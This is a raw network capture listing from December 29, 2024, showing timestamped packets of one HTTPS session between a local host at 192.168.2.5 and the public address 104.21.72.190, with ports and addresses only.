Dec 29, 2024 09:23:28.169522047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.169550896 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.169600010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.169624090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.169636965 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.169656038 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.174942017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.174962044 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.174998999 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.175009966 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.175031900 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.175050974 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.179718971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.179740906 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.179790020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.179800987 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.179897070 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.218173981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.218199968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.218235970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.218251944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.218271971 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.218287945 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.222903967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.222929955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.222971916 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.222976923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.223011017 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.228389978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.228410006 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.228456020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.228461981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.228498936 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.233728886 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.233748913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.233786106 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.233789921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.233828068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.270790100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.270808935 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.270842075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.270848989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.270879030 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.371277094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.371309996 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.371359110 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.371386051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.371402979 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.371443033 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.376760960 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.376780033 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.376838923 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.376844883 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.376878977 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.376899004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.381505013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.381525993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.381586075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.381586075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.381592989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.381640911 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.420002937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.420025110 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.420072079 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.420087099 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.420124054 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.420147896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.424477100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.424503088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.424551010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.424556017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.424593925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.424618006 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.429968119 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.429999113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.430039883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.430044889 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.430082083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.430092096 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.435384035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.435410023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.435460091 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.435467005 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.435482025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.435511112 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.472213030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.472238064 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.472282887 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.472292900 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.472326040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.472338915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.572638035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.572665930 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.572719097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.572746992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.572758913 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.572788000 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.577832937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.577850103 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.577891111 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.577896118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.577931881 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.583296061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.583317995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.583352089 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.583358049 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.583391905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.583424091 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.621026039 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.621045113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.621097088 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.621104956 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.621121883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.621150970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.626487970 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.626503944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.626619101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.626636028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.626679897 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.631244898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.631261110 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.631316900 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.631320953 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.631371021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.636624098 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.636642933 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.636687994 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.636693954 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.636733055 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.673317909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.673336029 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.673403978 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.673448086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.673553944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.773878098 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.773904085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.773967981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.773983955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.774013996 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.774038076 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.779171944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.779186964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.779257059 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.779263020 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.779347897 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.783952951 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.783967018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.784018040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.784028053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.784065962 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.822258949 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.822288036 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.822339058 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.822355986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.822386026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.822415113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.827670097 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.827687025 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.827742100 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.827748060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.827837944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.832518101 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.832540989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.832601070 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.832607985 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.832703114 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.837873936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.837889910 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.837945938 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.837950945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.837980986 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.837991953 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.874866009 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.874893904 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.874943018 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.874959946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.874998093 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.875011921 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.975193024 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.975227118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.975326061 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.975387096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.976206064 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.980492115 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.980509996 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.980550051 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.980559111 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.980598927 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.980622053 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.985960960 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.985989094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.986043930 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:28.986051083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:28.986146927 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.023581028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.023611069 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.023677111 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.023708105 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.023801088 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.028785944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.028808117 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.028865099 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.028875113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.028917074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.034348965 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.034368038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.034425974 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.034435034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.034497023 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.039025068 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.039042950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.039103985 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.039113045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.039155006 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.076724052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.076745987 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.076806068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.076827049 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.076877117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.176611900 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.176649094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.176692963 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.176709890 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.176728964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.176745892 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.181988001 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.182003975 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.182046890 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.182051897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.182086945 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.182102919 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.187474012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.187500000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.187542915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.187547922 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.187573910 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.187604904 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.224925041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.224947929 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.225001097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.225023031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.225127935 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.229907036 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.229923964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.229967117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.229973078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.230003119 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.230016947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.235397100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.235414028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.235472918 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.235480070 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.235553026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.240750074 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.240767956 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.240842104 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.240865946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.240938902 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.277610064 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.277637005 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.277681112 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.277698994 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.277720928 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.277735949 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.378268003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.378300905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.378384113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.378424883 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.378439903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.378509045 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.383641958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.383660078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.383733988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.383740902 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.383971930 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.388503075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.388520956 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.388575077 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.388586044 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.388608932 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.388801098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.426239967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.426263094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.426332951 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.426353931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.426647902 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.431622028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.431643963 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.431699038 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.431706905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.431734085 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.431761026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.436377048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.436395884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.436456919 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.436467886 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.436702013 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.441864967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.441881895 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.441945076 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.441951990 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.441972017 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.441999912 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.478833914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.478857994 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.478919983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.478939056 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.478960991 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.478976965 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.579694986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.579729080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.579780102 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.579818964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.579833984 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.579862118 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.584425926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.584446907 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.584503889 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.584511995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.584641933 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.589924097 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.589945078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.589977026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.589982033 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.590008020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.590028048 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.627589941 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.627624035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.627656937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.627681017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.627717972 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.627770901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.632911921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.632946968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.632989883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.632998943 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.633027077 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.633047104 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.638297081 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.638322115 CET	443	49709	104.21.72.190	192.168.2.5
